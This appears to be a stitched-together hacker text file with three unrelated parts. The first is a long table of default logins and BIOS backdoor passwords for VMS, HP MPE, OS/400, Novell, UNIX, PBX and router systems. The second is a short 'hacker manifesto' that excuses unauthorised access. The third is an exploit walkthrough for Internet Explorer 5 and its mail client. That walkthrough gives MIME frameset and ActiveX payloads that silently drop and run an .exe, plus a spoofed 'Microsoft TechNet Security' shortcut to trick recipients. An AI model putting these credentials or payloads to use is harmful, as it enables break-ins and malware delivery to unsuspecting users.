   Digital Equipment VMS Multi SYSTEM SYSTEM
   Digital Equipment VMS Multi SYSTEM MANAGER
   Digital Equipment VMS Multi SYSTEM OPERATOR
   Digital Equipment VMS Multi SYSTEM SYSLIB
   Digital Equipment VMS Multi SYSTEST UETP
   Digital Equipment VMS Multi SYSTEST_CLIG SYSTEST_CLIG
   Digital Equipment VMS Multi SYSTEST_CLIG SYSTEST
   Digital Equipment VMS Multi TELEDEMO TELEDEMO
   Digital Equipment VMS Multi TEST TEST
   Digital Equipment VMS Multi UETP UETP
   Digital Equipment VMS Multi USER PASSWORD
   Digital Equipment VMS Multi USERP USERP
   Digital Equipment VMS Multi VAX VAX
   Digital Equipment VMS Multi VMS VMS
   Dynix Library Systems Dynix circ <social sec #> User
   Dynix Library Systems Dynix LIBRARY (none) User
   Dynix Library Systems Dynix SETUP (none) Admin
   Efficient Speedstream DSL n/a admin Admin
   Enox BIOS Console n/a xo11nE Admin
   Epox BIOS Console n/a central Admin
   Ericsson Ericsson Acc netman netman
   Flowpoint Flowpoint DSL admin admin Admin
   Freetech BIOS Console n/a Posterie Admin
   Galacticomm Major BBS Multi Sysop Sysop Admin
   Hewlett-Packard HP 2000/3000 MPE/xx ADVMAIL HPOFFICE,DATA
   Hewlett-Packard HP 2000/3000 MPE/xx ADVMAIL HP
   Hewlett-Packard HP 2000/3000 MPE/xx FIELD SUPPORT
   Hewlett-Packard HP 2000/3000 MPE/xx FIELD MGR
   Hewlett-Packard HP 2000/3000 MPE/xx FIELD SERVICE
   Hewlett-Packard HP 2000/3000 MPE/xx FIELD MANAGER
   Hewlett-Packard HP 2000/3000 MPE/xx FIELD HPP187,SYS
   Hewlett-Packard HP 2000/3000 MPE/xx FIELD LOTUS
   Hewlett-Packard HP 2000/3000 MPE/xx FIELD HPWORD,PUB
   Hewlett-Packard HP 2000/3000 MPE/xx FIELD HPONLY
   Hewlett-Packard HP 2000/3000 MPE/xx HELLO MANAGER.SYS
   Hewlett-Packard HP 2000/3000 MPE/xx HELLO MGR.SYS
   Hewlett-Packard HP 2000/3000 MPE/xx HELLO FIELD.SUPPORT
   Hewlett-Packard HP 2000/3000 MPE/xx HELLO OP.OPERATOR
   Hewlett-Packard HP 2000/3000 MPE/xx MAIL MAIL
   Hewlett-Packard HP 2000/3000 MPE/xx MAIL REMOTE
   Hewlett-Packard HP 2000/3000 MPE/xx MAIL TELESUP
   Hewlett-Packard HP 2000/3000 MPE/xx MAIL HPOFFICE
   Hewlett-Packard HP 2000/3000 MPE/xx MAIL MPE
   Hewlett-Packard HP 2000/3000 MPE/xx MANAGER TCH
   Hewlett-Packard HP 2000/3000 MPE/xx MANAGER SYS
   Hewlett-Packard HP 2000/3000 MPE/xx MANAGER SECURITY
   Hewlett-Packard HP 2000/3000 MPE/xx MANAGER ITF3000
   Hewlett-Packard HP 2000/3000 MPE/xx MANAGER HPOFFICE
   Hewlett-Packard HP 2000/3000 MPE/xx MANAGER COGNOS
   Hewlett-Packard HP 2000/3000 MPE/xx MANAGER TELESUP
   Hewlett-Packard HP 2000/3000 MPE/xx MGE VESOFT
   Hewlett-Packard HP 2000/3000 MPE/xx MGE VESOFT
   Hewlett-Packard HP 2000/3000 MPE/xx MGR SYS
   Hewlett-Packard HP 2000/3000 MPE/xx MGR CAROLIAN
   Hewlett-Packard HP 2000/3000 MPE/xx MGR VESOFT
   Hewlett-Packard HP 2000/3000 MPE/xx MGR XLSERVER
   Hewlett-Packard HP 2000/3000 MPE/xx MGR SECURITY
   Hewlett-Packard HP 2000/3000 MPE/xx MGR TELESUP
   Hewlett-Packard HP 2000/3000 MPE/xx MGR HPDESK
   Hewlett-Packard HP 2000/3000 MPE/xx MGR CCC
   Hewlett-Packard HP 2000/3000 MPE/xx MGR CNAS
   Hewlett-Packard HP 2000/3000 MPE/xx MGR WORD
   Hewlett-Packard HP 2000/3000 MPE/xx MGR COGNOS
   Hewlett-Packard HP 2000/3000 MPE/xx MGR ROBELLE
   Hewlett-Packard HP 2000/3000 MPE/xx MGR HPOFFICE
   Hewlett-Packard HP 2000/3000 MPE/xx MGR HPONLY
   Hewlett-Packard HP 2000/3000 MPE/xx MGR HPP187
   Hewlett-Packard HP 2000/3000 MPE/xx MGR HPP189
   Hewlett-Packard HP 2000/3000 MPE/xx MGR HPP196
   Hewlett-Packard HP 2000/3000 MPE/xx MGR INTX3
   Hewlett-Packard HP 2000/3000 MPE/xx MGR ITF3000
   Hewlett-Packard HP 2000/3000 MPE/xx MGR NETBASE
   Hewlett-Packard HP 2000/3000 MPE/xx MGR REGO
   Hewlett-Packard HP 2000/3000 MPE/xx MGR RJE
   Hewlett-Packard HP 2000/3000 MPE/xx MGR CONV
   Hewlett-Packard HP 2000/3000 MPE/xx OPERATOR SYS
   Hewlett-Packard HP 2000/3000 MPE/xx OPERATOR DISC
   Hewlett-Packard HP 2000/3000 MPE/xx OPERATOR SYSTEM
   Hewlett-Packard HP 2000/3000 MPE/xx OPERATOR SUPPORT
   Hewlett-Packard HP 2000/3000 MPE/xx OPERATOR COGNOS
   Hewlett-Packard HP 2000/3000 MPE/xx PCUSER SYS
   Hewlett-Packard HP 2000/3000 MPE/xx RSBCMON SYS
   Hewlett-Packard HP 2000/3000 MPE/xx SPOOLMAN HPOFFICE
   Hewlett-Packard HP 2000/3000 MPE/xx WP HPOFFICE
   Hewlett-Packard Vectra Console n/a hewlpack Admin
   IBM AIX Multi guest (none) User
   IBM AIX Multi guest guest User
   IBM BIOS Console n/a IBM Admin
   IBM BIOS Console n/a MBIU0 Admin
   IBM BIOS Console n/a sertafu Admin
   IBM OS/400 Multi ibm password
   IBM OS/400 Multi ibm 2222
   IBM OS/400 Multi ibm service
   IBM OS/400 Multi qpgmr qpgmr
   IBM OS/400 Multi qsecofr qsecofr
   IBM OS/400 Multi qsecofr 11111111
   IBM OS/400 Multi qsecofr 22222222
   IBM OS/400 Multi qserv qserv
   IBM OS/400 Multi qsvr qsvr
   IBM OS/400 Multi qsvr ibmcel
   IBM OS/400 Multi qsysopr qsysopr
   IBM OS/400 Multi secofr secofr
   IBM POS CMOS Console ESSEX
   IBM POS CMOS Console IPC
   IBM VM/CMS Multi $ALOC$ (none)
   IBM VM/CMS Multi ADMIN (none)
   IBM VM/CMS Multi AP2SVP (none)
   IBM VM/CMS Multi APL2PP (none)
   IBM VM/CMS Multi AUTOLOG1 (none)
   IBM VM/CMS Multi BATCH (none)
   IBM VM/CMS Multi BATCH1 (none)
   IBM VM/CMS Multi BATCH2 (none)
   IBM VM/CMS Multi CCC (none)
   IBM VM/CMS Multi CMSBATCH (none)
   IBM VM/CMS Multi CMSUSER (none)
   IBM VM/CMS Multi CPNUC (none)
   IBM VM/CMS Multi CPRM (none)
   IBM VM/CMS Multi CSPUSER (none)
   IBM VM/CMS Multi CVIEW (none)
   IBM VM/CMS Multi DATAMOVE (none)
   IBM VM/CMS Multi DEMO1 (none)
   IBM VM/CMS Multi DEMO2 (none)
   IBM VM/CMS Multi DEMO3 (none)
   IBM VM/CMS Multi DEMO4 (none)
   IBM VM/CMS Multi DIRECT (none)
   IBM VM/CMS Multi DIRMAINT (none)
   IBM VM/CMS Multi DISKCNT (none)
   IBM VM/CMS Multi EREP (none)
   IBM VM/CMS Multi FSFADMIN (none)
   IBM VM/CMS Multi FSFTASK1 (none)
   IBM VM/CMS Multi FSFTASK2 (none)
   IBM VM/CMS Multi GCS (none)
   IBM VM/CMS Multi IDMS (none)
   IBM VM/CMS Multi IDMSSE (none)
   IBM VM/CMS Multi IIPS (none)
   IBM VM/CMS Multi IPFSERV (none)
   IBM VM/CMS Multi ISPVM (none)
   IBM VM/CMS Multi IVPM1 (none)
   IBM VM/CMS Multi IVPM2 (none)
   IBM VM/CMS Multi MAINT (none)
   IBM VM/CMS Multi MOESERV (none)
   IBM VM/CMS Multi NEVIEW (none)
   IBM VM/CMS Multi OLTSEP (none)
   IBM VM/CMS Multi OP1 (none)
   IBM VM/CMS Multi OPERATNS (none)
   IBM VM/CMS Multi OPERATOR (none)
   IBM VM/CMS Multi PDMREMI (none)
   IBM VM/CMS Multi PENG (none)
   IBM VM/CMS Multi PROCAL (none)
   IBM VM/CMS Multi PRODBM (none)
   IBM VM/CMS Multi PROMAIL (none)
   IBM VM/CMS Multi PSFMAINT (none)
   IBM VM/CMS Multi PVM (none)
   IBM VM/CMS Multi RDM470 (none)
   IBM VM/CMS Multi ROUTER (none)
   IBM VM/CMS Multi RSCS (none)
   IBM VM/CMS Multi RSCSV2 (none)
   IBM VM/CMS Multi SAVSYS (none)
   IBM VM/CMS Multi SFCMI (none)
   IBM VM/CMS Multi SFCNTRL (none)
   IBM VM/CMS Multi SMART (none)
   IBM VM/CMS Multi SQLDBA (none)
   IBM VM/CMS Multi SQLUSER (none)
   IBM VM/CMS Multi SYSADMIN (none)
   IBM VM/CMS Multi SYSCKP (none)
   IBM VM/CMS Multi SYSDUMP1 (none)
   IBM VM/CMS Multi SYSERR (none)
   IBM VM/CMS Multi SYSWRM (none)
   IBM VM/CMS Multi TDISK (none)
   IBM VM/CMS Multi TEMP (none)
   IBM VM/CMS Multi TSAFVM (none)
   IBM VM/CMS Multi VASTEST (none)
   IBM VM/CMS Multi VM3812 (none)
   IBM VM/CMS Multi VMARCH (none)
   IBM VM/CMS Multi VMASMON (none)
   IBM VM/CMS Multi VMASSYS (none)
   IBM VM/CMS Multi VMBACKUP (none)
   IBM VM/CMS Multi VMBSYSAD (none)
   IBM VM/CMS Multi VMMAP (none)
   IBM VM/CMS Multi VMTAPE (none)
   IBM VM/CMS Multi VMTLIBR (none)
   IBM VM/CMS Multi VMUTIL (none)
   IBM VM/CMS Multi VSEIPO (none)
   IBM VM/CMS Multi VSEMAINT (none)
   IBM VM/CMS Multi VSEMAN (none)
   IBM VM/CMS Multi VTAM (none)
   IBM VM/CMS Multi VTAMUSER (none)
   Intel Shiva Guest (none) User
   Intel Shiva root (none) Admin
   Iwill BIOS Console n/a iwill Admin
   JetWay BIOS Console n/a spooml Admin
   Joss Technology BIOS Console n/a 57gbzb Admin
   Joss Technology BIOS Console n/a technolgi Admin
   Lantronics Lantronics Terminal Server TCP 7000 n/a access Admin
   Lantronics Lantronics Terminal Server TCP 7000 n/a system Admin
   Leading Edge BIOS Console n/a MASTER Admin
   Linksys Linksys DSL n/a admin Admin
   Linux Slackware Multi gonzo (none) User
   Linux Slackware Multi satan (none) User
   Linux Slackware Multi snake (none) User
   Linux UCLinux for UCSIMM Multi root uClinux Admin
   Livingston Livingston Portmaster 3 !root (none)
   Lucent System 75 bciim bciimpw
   Lucent System 75 bcim bcimpw
   Lucent System 75 bcms bcmspw
   Lucent System 75 bcms bcmspw
   Lucent System 75 bcnas bcnaspw
   Lucent System 75 blue bluepw
   Lucent System 75 browse browsepw
   Lucent System 75 browse looker
   Lucent System 75 craft craft
   Lucent System 75 craft craftpw
   Lucent System 75 craft craftpw
   Lucent System 75 cust custpw
   Lucent System 75 enquiry enquirypw
   Lucent System 75 field support
   Lucent System 75 inads indspw
   Lucent System 75 inads indspw
   Lucent System 75 inads inads
   Lucent System 75 init initpw
   Lucent System 75 locate locatepw
   Lucent System 75 maint maintpw
   Lucent System 75 maint rwmaint
   Lucent System 75 nms nmspw
   Lucent System 75 rcust rcustpw
   Lucent System 75 support supportpw
   Lucent System 75 tech field
   M Technology BIOS Console n/a mMmM Admin
   MachSpeed BIOS Console n/a sp99dd Admin
   Magic-Pro BIOS Console n/a prost Admin
   Megastar BIOS Console n/a star Admin
   Mentec Micro/RSX MICRO RSX Admin
   Micron BIOS Console n/a sldkj754 Admin
   Micron BIOS Console n/a xyzall Admin
   Micronics BIOS Console n/a dn_04rjc Admin
   Microsoft Windows NT Multi (null) (none) User "Redbutton Hole"
   Microsoft Windows NT Multi Administrator Administrator Admin
   Microsoft Windows NT Multi Administrator (none) Admin
   Microsoft Windows NT Multi Guest Guest User
   Microsoft Windows NT Multi Guest (none) User
   Microsoft Windows NT Multi IS_$hostname (same) User hostname = your server name
   Microsoft Windows NT Multi User User User
   Mintel Mintel PBX n/a SYSTEM Admin
   Motorola Motorola Cablerouter cablecom router Admin
   NCR NCR UNIX Multi ncrm ncrm Admin
   Netopia Netopia 7100 (none) (none)
   Netopia Netopia 9500 netopia netopia
   NeXT NeXTStep Multi me (none) User
   NeXT NeXTStep Multi root NeXT Admin
   NeXT NeXTStep Multi signa signa User
   Nimble BIOS Console n/a xdfk9874t3 Admin
   Nortel Meridian PBX Serial login 0000 AUTH codes in LD 8
   Nortel Meridian PBX Serial spcl 0000 AUTH codes in LD 8
   Novell Netware Multi ADMIN ADMIN
   Novell Netware Multi ADMIN (none)
   Novell Netware Multi ARCHIVIST (none)
   Novell Netware Multi ARCHIVIST ARCHIVIST
   Novell Netware Multi BACKUP (none)
   Novell Netware Multi BACKUP BACKUP
   Novell Netware Multi CHEY_ARCHSVR CHEY_ARCHSVR
   Novell Netware Multi CHEY_ARCHSVR (none)
   Novell Netware Multi FAX FAX
   Novell Netware Multi FAX (none)
   Novell Netware Multi FAXUSER FAXUSER
   Novell Netware Multi FAXUSER (none)
   Novell Netware Multi FAXWORKS (none)
   Novell Netware Multi FAXWORKS FAXWORKS
   Novell Netware Multi GATEWAY GATEWAY
   Novell Netware Multi GATEWAY GATEWAY
   Novell Netware Multi GATEWAY (none)
   Novell Netware Multi GUEST TSEUG
   Novell Netware Multi GUEST GUESTGUEST
   Novell Netware Multi GUEST GUESTGUE
   Novell Netware Multi GUEST GUEST
   Novell Netware Multi GUEST (none)
   Novell Netware Multi HPLASER (none)
   Novell Netware Multi HPLASER HPLASER
   Novell Netware Multi LASER (none)
   Novell Netware Multi LASER LASER
   Novell Netware Multi LASERWRITER LASERWRITER
   Novell Netware Multi LASERWRITER (none)
   Novell Netware Multi MAIL (none)
   Novell Netware Multi MAIL MAIL
   Novell Netware Multi POST (none)
   Novell Netware Multi POST POST
   Novell Netware Multi PRINT (none)
   Novell Netware Multi PRINT PRINT
   Novell Netware Multi PRINTER (none)
   Novell Netware Multi PRINTER PRINTER
   Novell Netware Multi ROOT (none)
   Novell Netware Multi ROOT ROOT
   Novell Netware Multi ROUTER (none)
   Novell Netware Multi SABRE (none)
   Novell Netware Multi SUPERVISOR NETFRAME
   Novell Netware Multi SUPERVISOR NFI
   Novell Netware Multi SUPERVISOR NF
   Novell Netware Multi SUPERVISOR HARRIS
   Novell Netware Multi SUPERVISOR SUPERVISOR
   Novell Netware Multi SUPERVISOR (none)
   Novell Netware Multi SUPERVISOR SYSTEM
   Novell Netware Multi TEST TEST
   Novell Netware Multi TEST (none)
   Novell Netware Multi USER_TEMPLATE (none)
   Novell Netware Multi USER_TEMPLATE USER_TEMPLATE
   Novell Netware Multi WANGTEK (none)
   Novell Netware Multi WANGTEK WANGTEK
   Novell Netware Multi WINDOWS_PASSTHRU WINDOWS_PASSTHRU
   Novell Netware Multi WINDOWS_PASSTHRU (none)
   Novell Netware Multi WINSABRE SABRE
   Novell Netware Multi WINSABRE WINSABRE
   Nurit NOS $system (none) Admin
   Osicom Osicom Plus T1/PLUS 56k write private
   Osicom NETPrint 1000E/NDS Telnet sysadm sysadm Admin
   Osicom NETPrint 1500E/N Telnet sysadm sysadm Admin
   Osicom NETPrint 2000E/N Telnet sysadm sysadm Admin
   Osicom NETPrint 1000E/B Telnet sysadm sysadm Admin
   Osicom NETPrint 2000E/B Telnet sysadm sysadm Admin
   Osicom NETPrint 1000E/N Telnet sysadm sysadm Admin
   Osicom NETPrint 2000E/N Telnet sysadm sysadm Admin
   Osicom NETPrint 1000 T/B Telnet sysadm sysadm Admin
   Osicom NETPrint 2000 T/B Telnet sysadm sysadm Admin
   Osicom NETPrint 1000 T/N Telnet sysadm sysadm Admin
   Osicom NETPrint 2000 T/N Telnet sysadm sysadm Admin
   Osicom NETPrint 1500 E/B Telnet sysadm sysadm Admin
   Osicom NETPrint 1500E/N Telnet sysadm sysadm Admin
   Osicom NETPrint 1500T/N Telnet sysadm sysadm Admin
   Osicom NETPrint 1000E/D Telnet sysadm sysadm Admin
   Osicom NETPrint 500 E/B Telnet sysadm sysadm Admin
   Osicom NETPrint 500 E/N Telnet sysadm sysadm Admin
   Osicom NETPrint 500 T/B Telnet sysadm sysadm Admin
   Osicom NETPrint 500 T/N Telnet sysadm sysadm Admin
   Osicom NETCommuter Remote Access Server Telnet sysadm sysadm Admin
   Osicom JETXPrint 1000E/B Telnet sysadm sysadm Admin
   Osicom JETXPrint 1000E/N Telnet sysadm sysadm Admin
   Osicom JETXPrint 1000T/N Telnet sysadm sysadm Admin
   Osicom JETXPrint 500 E/B Telnet sysadm sysadm Admin
   Osicom NETCommuter Remote Access Server Telnet Manager Manager Admin
   Osicom NETCommuter Remote Access Server Telnet guest guest User
   Osicom NETCommuter Remote Access Server Telnet echo echo User
   Osicom NETCommuter Remote Access Server Telnet debug d.e.b.u.g User
   Osicom NETPrint 1500 E/B Telnet Manager Manager Admin
   Osicom NETPrint 1500 E/B Telnet guest guest User
   Osicom NETPrint 1500 E/B Telnet echo echo User
   Osicom NETPrint 1500 E/B Telnet debug d.e.b.u.g User
   Osicom NETPrint 1000E/D Telnet Manager Manager Admin
   Osicom NETPrint 1000E/D Telnet guest guest User
   Osicom NETPrint 1000E/D Telnet echo echo User
   Osicom NETPrint 1000E/D Telnet debug d.e.b.u.g User
   Osicom NETPrint 1000E/NDS Telnet Manager Manager Admin
   Osicom NETPrint 1000E/NDS Telnet guest guest User
   Osicom NETPrint 1000E/NDS Telnet echo echo User
   Osicom NETPrint 1000E/NDS Telnet debug d.e.b.u.g User
   Osicom NETPrint 1500E/N Telnet Manager Manager Admin
   Osicom NETPrint 1500E/N Telnet guest guest User
   Osicom NETPrint 1500E/N Telnet echo echo User
   Osicom NETPrint 1500E/N Telnet debug d.e.b.u.g User
   Osicom NETPrint 2000E/N Telnet Manager Manager Admin
   Osicom NETPrint 2000E/N Telnet guest guest User
   Osicom NETPrint 2000E/N Telnet echo echo User
   Osicom NETPrint 2000E/N Telnet debug d.e.b.u.g User
   Packard Bell BIOS Console n/a bell9 Admin
   Prime PrimeOS Multi guest guest User
   Prime PrimeOS Multi guest1 guest User
   Prime PrimeOS Multi guest1 guest1 User
   Prime PrimeOS Multi mail mail User
   Prime PrimeOS Multi mfd mfd User
   Prime PrimeOS Multi netlink netlink User
   Prime PrimeOS Multi prime prime User
   Prime PrimeOS Multi primenet primenet User
   Prime PrimeOS Multi primenet primeos User
   Prime PrimeOS Multi primos_cs primos User
   Prime PrimeOS Multi primos_cs prime User
   Prime PrimeOS Multi system prime Admin
   Prime PrimeOS Multi system system Admin
   Prime PrimeOS Multi tele tele User
   Prime PrimeOS Multi test test User
   QDI BIOS Console n/a QDI Admin
   QDI SpeedEasy BIOS Console n/a lesarotl Admin
   Quantex BIOS Console n/a teX1 Admin
   Quantex BIOS Console n/a xljlbj Admin
   Radio Shack Radio Shack Screen Saver Console n/a RS<storeid> User
   Ramp Networks WebRamp wradmin trancell
   Research BIOS Console n/a Col2ogro2 Admin
   Semaphore PICK O/S DESQUETOP
   Semaphore PICK O/S DS
   Semaphore PICK O/S DSA
   Semaphore PICK O/S PHANTOM
   Shuttle BIOS n/a Spacve Admin
   Siemens PhoneMail poll tech
   Siemens PhoneMail sysadmin sysadmin
   Siemens PhoneMail tech tech
   Siemens ROLM PBX admin pwp
   Siemens ROLM PBX eng engineer
   Siemens ROLM PBX op op
   Siemens ROLM PBX op operator
   Siemens ROLM PBX su super
   Siemens Nixdorf BIOS Console n/a SKY_FOX Admin
   Silicon Graphics IRIX Multi 4Dgifts 4Dgifts Admin
   Silicon Graphics IRIX Multi 4Dgifts (none) Admin
   Silicon Graphics IRIX Multi demos (none) Admin
   Silicon Graphics IRIX Multi Ezsetup (none) Admin
   Silicon Graphics IRIX Multi field field Admin
   Silicon Graphics IRIX Multi OutOfBox (none) Admin
   Silicon Graphics IRIX Multi tour tour Admin
   Silicon Graphics IRIX Multi tutor (none) Admin
   Silicon Graphics IRIX Multi tutor tutor Admin
   SuperMicro BIOS Console n/a ksdjfg934t Admin
   Taco Bell Proprietary System (?) rgm rollout
   Taco Bell Proprietary System (?) tacobell (none)
   Tinys BIOS Console n/a tiny Admin
   TMC BIOS Console n/a BIGO Admin
   Toshiba BIOS Console n/a 24Banc81 Admin
   Toshiba BIOS Console n/a Toshiba Admin
   Toshiba BIOS Console n/a toshy99 Admin
   UNIX Generic Multi adm adm
   UNIX Generic Multi adm (none)
   UNIX Generic Multi admin admin
   UNIX Generic Multi administrator administrator
   UNIX Generic Multi administrator (none)
   UNIX Generic Multi anon anon
   UNIX Generic Multi bbs bbs
   UNIX Generic Multi bbs (none)
   UNIX Generic Multi bin sys
   UNIX Generic Multi bin sys
   UNIX Generic Multi checkfs checkfs
   UNIX Generic Multi checkfsys checkfsys
   UNIX Generic Multi checksys checksys
   UNIX Generic Multi daemon daemon
   UNIX Generic Multi daemon (none)
   UNIX Generic Multi demo demo
   UNIX Generic Multi demo (none)
   UNIX Generic Multi demos demos
   UNIX Generic Multi demos (none)
   UNIX Generic Multi dni (none)
   UNIX Generic Multi dni dni
   UNIX Generic Multi fal (none)
   UNIX Generic Multi fal fal
   UNIX Generic Multi fax (none)
   UNIX Generic Multi fax fax
   UNIX Generic Multi ftp (none)
   UNIX Generic Multi ftp ftp
   UNIX Generic Multi games games
   UNIX Generic Multi games (none)
   UNIX Generic Multi gopher gopher
   UNIX Generic Multi gropher (none)
   UNIX Generic Multi guest guest
   UNIX Generic Multi guest guestgue
   UNIX Generic Multi guest (none)
   UNIX Generic Multi halt halt
   UNIX Generic Multi halt (none)
   UNIX Generic Multi informix informix
   UNIX Generic Multi install install
   UNIX Generic Multi lp lp
   UNIX Generic Multi lp bin
   UNIX Generic Multi lp lineprin
   UNIX Generic Multi lp (none)
   UNIX Generic Multi lpadm lpadm
   UNIX Generic Multi lpadmin lpadmin
   UNIX Generic Multi lynx lynx
   UNIX Generic Multi lynx (none)
   UNIX Generic Multi mail (none)
   UNIX Generic Multi mail mail
   UNIX Generic Multi man man
   UNIX Generic Multi man (none)
   UNIX Generic Multi me (none)
   UNIX Generic Multi me me
   UNIX Generic Multi mountfs mountfs
   UNIX Generic Multi mountfsys mountfsys
   UNIX Generic Multi mountsys mountsys
   UNIX Generic Multi news news
   UNIX Generic Multi news (none)
   UNIX Generic Multi nobody (none)
   UNIX Generic Multi nobody nobody
   UNIX Generic Multi nuucp (none)
   UNIX Generic Multi operator operator
   UNIX Generic Multi operator (none)
   UNIX Generic Multi oracle (none)
   UNIX Generic Multi postmaster postmast
   UNIX Generic Multi postmaster (none)
   UNIX Generic Multi powerdown powerdown
   UNIX Generic Multi rje rje
   UNIX Generic Multi root root
   UNIX Generic Multi root (none)
   UNIX Generic Multi setup setup
   UNIX Generic Multi shutdown shutdown
   UNIX Generic Multi shutdown (none)
   UNIX Generic Multi sync sync
   UNIX Generic Multi sync (none)
   UNIX Generic Multi sys sys
   UNIX Generic Multi sys system
   UNIX Generic Multi sys bin
   UNIX Generic Multi sysadm sysadm
   UNIX Generic Multi sysadm admin
   UNIX Generic Multi sysadmin sysadmin
   UNIX Generic Multi sysbin sysbin
   UNIX Generic Multi system_admin (none)
   UNIX Generic Multi system_admin system_admin
   UNIX Generic Multi trouble trouble
   UNIX Generic Multi umountfs umountfs
   UNIX Generic Multi umountfsys umountfsys
   UNIX Generic Multi umountsys umountsys
   UNIX Generic Multi unix unix
   UNIX Generic Multi user user
   UNIX Generic Multi uucp uucp
   UNIX Generic Multi uucpadm uucpadm
   UNIX Generic Multi web (none)
   UNIX Generic Multi web web
   UNIX Generic Multi webmaster webmaster
   UNIX Generic Multi webmaster (none)
   UNIX Generic Multi www (none)
   UNIX Generic Multi www www
   Verifone Verifone Junior 2.05 (none) 166816
   Vextrec Technology BIOS Console n/a Vextrex
   Vobis BIOS Console n/a merlin
   Wim Bervoets WIMBIOS BIOS Console n/a Compleri Admin
   WWWBoard WWWADMIN.PL HTTP WebAdmin WebBoard Admin
   Xyplex Routers Port 7000 n/a access User
   Xyplex Routers Port 7000 n/a system Admin
   Xyplex Terminal Server Port 7000 n/a access User
   Xyplex Terminal Server Port 7000 n/a system Admin
   Zenith BIOS Console n/a 3098z Admin
   Zenith BIOS Console n/a Zenith Admin
   ZEOS BIOS Console n/a zeosx Admin
   Zyxel Generic Routers n/a 1234 Admin



"Credits toward collecting these default passwords go to the Security 
Focus VULN-DEV mailing list, and specifically to contributors such as:

Roel of Temmingh, Nathan Einwechter <compsecure@softhome.net>,
George Kurtz, Stephen Friedl, Sebastian Andersson, Jonathan Leto, 
Mike Blomgren, Knud Erik H0jgaard <mobileunit@mobileunit.org>, Axel Dunkel, 
Mathias Bogaert, Jonatan Leto, Chris Owen, Jim Wildman, Santiago Zapata, 
Brian S. DuRoss, M J <lurker@ITIS.COM>, Will Spencer, Kevin Reynolds, 
MaxVision, Bluefish, Runar Jensen, Ex Machina, Matt van Amsterdam, 
Daniel Monjar, Rodrigo Bardosa, Damir Rajnovic, and scores of others."


---



.4ncifer manifest ; 001 ; 07.06-00



Since I first started learning about computers, I was amazed by this
new culture, this select group of people. We are smart, clever, and
hold true to our personal morals. Some people, I quickly learned after
that, seem to take enjoyment from using what real hackers code.

These 'script kiddies' bother me as much as the next hacker; they don't have 
these morals, the ethics of a true hacker.

A hacker, in my personal opinion, is a person, a rebel, that uses their 
talents, gifts, and knowledge to commandeer more knowledge and skills to 
gain more knowledge and skills on top of that. They thrive by learning. They 
absorb, expand, and control. This control is what scares the 'others'.

You've probably never heard of me. That's perfectly alright. Anonymity is 
just as sacred as popularity. I don't deface websites. I can, but I don't. I 
don't see the need. Maybe, someday, there will be, but neither my political 
-or- social demand such defacements. I reserve quick judgment upon people 
who do deface websites. They might have their reasons, and these motives 
show themselves in the defacements. People are entitled to their opinion, as 
much as I am mine, but the few (maybe most) who deface just to do it are 
pathetic. They may have the 'skillz' to achieve the defacement, but if there 
isn't any honor in the act, what does that show of the person committing it?

True hackers have this honor. They simply learn to do so. I've witnessed 
people argue about how the media throws the term 'hacker' around. I agree 
that they don't use the term correctly, but they don't use the terms 
'cracker' or 'phreak' plausibly either. Being a cracker does not denote a 
criminal, the same with a hacker. There are bad crackers & good crackers. 
There are bad hackers & good crackers. The media simply doesn't understand 
the whole picture. This culture of ours is too complex and volatile for the 
media to keep up. There are a few worthwhile hacker news sites. 
www.hackernews.com being the best in my opinion.

We all desire knowledge. This we gain; whether legally or illegally. I think 
that it shouldn't be illegal if the server doesn't know you're there.

Coming out of all of that, you may be a little confused. Never have I 
denoted even my existence upon the internet, except for this one time in 
which I get out my cents. I will now disappear again.

I hope I have encouraged some people to become true hackers, not script 
kiddies. I hope I have discouraged the blatant use of web defacing. I hope I 
have encouraged actually having ethics and staying with them; they are all 
that define a person. I hope I have made a good impression with all who read 
this, and that those people thrive, not merely stay alive.

As a leaving statement:
"Learn to love to read, and you'll love to learn all the more.
Then only comes experience, then, all the more, you'll score."

---

<slow-fie> Uhm, well, never to get high... I used to let a thin layer of
           elmer's school glue dry on my arm and peel it off like the aliens
           from that 80's sci-fi show "V"  



Intro
~~~~~
Internet Explorer 5, and the mail and news clients which come with it 
(on Win95/98/2K) are very strange in that they choose to ignore user input. 
More specifically, this allows us to manually force a file onto the target
computer, despite all prompts and warnings.


How can this be done?
~~~~~~~~~~~~~~~~~~~~~
We begin by creating a simple HTML FrameSet and embed, in base 64, our file:
<frameset rows=3D"10%,*">
<frame src=3D"mars.exe">
</frameset>

What happens?
~~~~~~~~~~~~~
What we do now is create a very simple HTML Mail or News file and send it to
the target computer. When they receive this file, and open it, the recipient
will be prompted as to whether they would like to "save" "open" or "cancel".
None of these really work. When the recipient decides which one to choose,
the file is being injected into the temp folder. Selecting any of the
three choices becomes completely useless. The file is still delivered to
the temp folder. Even if their system's "Security Zone" sets it to
DISABLE, they just get a slightly different prompt which only allows them
to press OK, and this is, once again, useless.

No matter what, the file is delivered into the temp folder.

So? What next?
~~~~~~~~~~~~~~
Well, next create a second file which contains a new ActiveX control:
(CLSID:15589FA1-C456-11CE-BF01-00AA0055595A)
Which allows us to execute files locally. We embed the simple JavaScripting
that runs this together with the ActiveX control, in base 64, and embed that in
a second html frame:

<frameset rows=3D"10%,*">
<frame src=3D"mars.exe" >
<frame src=3D"lunar.mhtml" >
</frameset>

Then we apply the VERY simple HTTP-EQUIV meta tag of refresh.

<meta http-equiv=3D"refresh"content=3D"5;
url=3Dmhtml:file://C:\WINDOWS\TEMP\lunar.mhtml">

and repack again in base64.

What are the results?
~~~~~~~~~~~~~~~~~~~~~
The first file deposits the *.exe and second *.mhtml files into the
temp directory. The client will be asked whether to save, open, or cancel.
No matter what choice they make, these files will be deposited as soon
as the prompt has been closed. The meta refresh will bounce to the
control and run the *.exe.

None of the Security Zone settings will prevent this because we are working
locally from the temp directory.


Now you want to do this over e-mail?
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Of course you can! You have a greater chance of failing though.

Create two sets of html messages:

The first one comprising of the file to be delivered:


<frameset rows=3D"10%,*">
<frame src=3D"refresh.bat" >
</frameset>

Note: to be executed from mail client. Simple *.bat containing @exit


The second comprising of a fraudulent, manufactured *.url:

Content-Type: application/octet-stream;
name=3D"Microsoft TechNet Security.url"
Content-Transfer-Encoding: 7bit
Content-Disposition: attachment;
filename=3D"Microsoft TechNet Security.url"

[DEFAULT]
BASEURL=3DC:\WINDOWS\TEMP\refresh.bat
[InternetShortcut]
URL=3DC:\WINDOWS\TEMP\refresh.bat

We include a fake link: <font color=3Dblue style=3D"cursor:hand">....

The recipient will then be forced to entertain the fraudulent *.url

--

